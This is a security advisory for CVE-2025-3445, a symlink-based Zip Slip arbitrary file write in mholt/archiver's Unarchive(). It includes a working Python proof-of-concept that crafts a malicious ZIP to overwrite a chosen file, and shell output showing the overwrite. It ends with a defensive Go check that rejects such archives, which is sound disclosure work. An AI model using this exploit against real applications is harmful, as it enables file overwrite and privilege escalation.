CVE-2025-3445

Affected versions (>=3.0.0, <4.0.0-alpha.1) of this package (mholt/archiver) are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) in the Unarchive() function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive containing symlinks that is unarchived by the vulnerable application.

A very similar vulnerability was found in TAR files (CVE-2024-0406).

Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to mholt/archiver is a new project called mholt/archives, and its initial release (v0.1.0) removes the Unarchive() functionality.


PoC || GTFO

» python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session

# Upload the file to a target that uses the Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:11 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
# cve-2025-3445.py
import zipfile
import sys

def create_zip(zip_path, symlink_target):
    with zipfile.ZipFile(zip_path, 'w') as zip_ref:
        # Entry 1: a symlink named "x" whose link target is the path given on
        # the command line. Unix mode 0o120777 (S_IFLNK | 0777) goes in the high
        # 16 bits of external_attr; the entry's data is the link target.
        symlink_info = zipfile.ZipInfo('./x')
        symlink_info.external_attr = 0o120777 << 16  # symlink type
        zip_ref.writestr(symlink_info, symlink_target)
        # Entry 2: a regular file with the same name. An extractor that has
        # already created the symlink writes this content through it, i.e.
        # into symlink_target (see the cat output above).
        regular_file_content = b'<some-file-content-here>'
        zip_ref.writestr('x', regular_file_content)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    zip_path = "cve-2025-3445.zip"

    create_zip(zip_path, symlink_target)
    print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")
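As an added example (not code from this advisory or from mholt/archiver), the check a hardened Unarchive() would run over a ZIP before writing anything: it refuses the archive shape the PoC above produces, a symlink entry whose target leaves the destination followed by a regular entry at the same path, and also plain ../ traversal names. The function and message names are my own.

```go
package main

import (
	"archive/zip"
	"bytes"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// escapes reports whether path p lies outside dir (both are cleaned by Rel).
func escapes(dir, p string) bool {
	rel, err := filepath.Rel(dir, p)
	return err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// UnsafeEntries vets a ZIP before anything is written under dest: names that
// traverse out of dest, symlinks whose target resolves outside dest, and entries
// whose path an earlier entry already declared as a symlink (the PoC's pairing).
func UnsafeEntries(data []byte, dest string) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if zr == nil { // a non-nil reader with a non-fatal error is still usable
		return nil, err
	}
	links := map[string]bool{}
	var bad []string
	for _, f := range zr.File {
		p := filepath.Join(dest, f.Name) // Join cleans the result
		switch {
		case escapes(dest, p):
			bad = append(bad, f.Name+": path escapes destination")
		case links[p]:
			bad = append(bad, f.Name+": path already declared as a symlink")
		case f.Mode()&os.ModeSymlink != 0:
			links[p] = true
			rc, err := f.Open() // a symlink entry's data is its link target
			if err != nil {
				return nil, err
			}
			target, _ := io.ReadAll(rc)
			rc.Close()
			t := string(target)
			if filepath.IsAbs(t) || escapes(dest, filepath.Join(filepath.Dir(p), t)) {
				bad = append(bad, f.Name+": symlink target "+t+" leaves destination")
			}
		}
	}
	return bad, nil
}
```

An empty result means the archive may be extracted; anything else should abort extraction before the first write.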
